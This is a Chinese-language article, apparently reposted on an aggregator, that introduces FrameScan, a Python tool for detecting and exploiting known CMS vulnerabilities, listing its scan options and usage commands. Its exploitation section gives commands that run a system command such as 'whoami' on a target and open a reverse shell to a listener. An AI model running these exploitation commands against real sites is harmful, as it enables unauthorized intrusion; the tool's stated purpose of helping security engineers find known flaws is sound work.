专栏名称: Web安全工具库
将一些好用的web安全工具和自己的学习笔记分享给大家。。。
目录
相关文章推荐
秦皇岛晚报  ·  【中国好手艺117】铁艺灯笼 ·  16 小时前  
秦皇岛晚报  ·  【中国好手艺117】铁艺灯笼 ·  16 小时前  
古典文献学微刊  ·  编辑·手记 | ... ·  2 天前  
天津日报  ·  老字号 共潮生| 玉川居:扎根传统 拥抱变化 ·  昨天  
青澄财经  ·  携程金融打造携程增长第三极 ·  2 天前  
青澄财经  ·  携程金融打造携程增长第三极 ·  2 天前  
增删卜易  ·  古筮索隐:占托人荐馆,附实战“荐馆”卦一例( ... ·  3 天前  
51好读  ›  专栏  ›  Web安全工具库

cms漏洞检测框架 -- FrameScan(8月4日更新 )

Web安全工具库  · 公众号  ·  · 2024-08-07 09:03

正文

===================================

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络, 安全性自测 ,如有侵权请联系删除。个人微信: ivu123ivu

0x01 工具介绍

FrameScan是一款python3编写的简易的cms漏洞检测利用框架,支持漏洞检测与简单利用方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。

0x02 安装与使用

一、 单URL批量检测 

python3 FrameScan.py -u URL

二、单URL单漏洞检测(POC_NAME可以用 -l、-s、-la进行查询) 

python3 FrameScan.py -u URL -n POC_NAME

三、单URL指定CMS检测 

python3 FrameScan.py -u URL -cms CMS_NAME

四、 多URL批量检测 

python3 FrameScan.py -f 文件名

五、多URL单漏洞检测 

python3 FrameScan.py -f 文件名  -n  POC_NAME

六、多URL指定CMS检测 

python3 FrameScan.py -f 文件名  -cms  CMS_NAME

七、输出到TXT或者HTML文件 

python3 FrameScan.py -u URL -txt   文件名python3 FrameScan.py -u URL -html  文件名

八、单URL漏洞利用 

python3 FrameScan.py -u URL -m exp -v exp_name python3 FrameScan.py -u URL -m exp -v exp_name -c whoamipython3 FrameScan.py -u URL -m exp -v exp_name -shell 127.0.0.1:8080  #127.0.0.1:8080为反弹shell的端口

九、多URL漏洞利用 

python3 FrameScan.py -f 文件  -m exp -v exp_name 






请到「今天看啥」查看全文


推荐文章
秦皇岛晚报  ·  【中国好手艺117】铁艺灯笼
16 小时前
秦皇岛晚报  ·  【中国好手艺117】铁艺灯笼
16 小时前
古典文献学微刊  ·  编辑·手记 | 突破传统书画艺术出版的新尝试——《幽兰妙指:唐抄古琴文献二种》
2 天前
天津日报  ·  老字号 共潮生| 玉川居:扎根传统 拥抱变化
昨天
青澄财经  ·  携程金融打造携程增长第三极
2 天前
青澄财经  ·  携程金融打造携程增长第三极
2 天前
增删卜易  ·  古筮索隐:占托人荐馆,附实战“荐馆”卦一例(《春龙集奇灵卦验》)
3 天前
中国经济网  ·  吃辣等于慢性自杀?!这9类人一定要避开丨健康
8 年前
澎湃新闻  ·  雪豹,其实是名字里带“豹”的大猫?
7 年前
美芽  ·  防晒到底卸不卸?化妆后怎么补?不知道这8点,你的防晒霜都白擦了!
7 年前
梧桐会  ·  你所有无忧无虑的生活,都是一场提前消费
7 年前
神经介入在线  ·  精彩回顾|脑卒中急救关键技术全国巡讲石家庄站——ANGEL取栓沙龙
7 年前
Sov5搜索   ·   小百科   ·   今天看啥   ·   移动版
51好读 - 好文章就要读起来!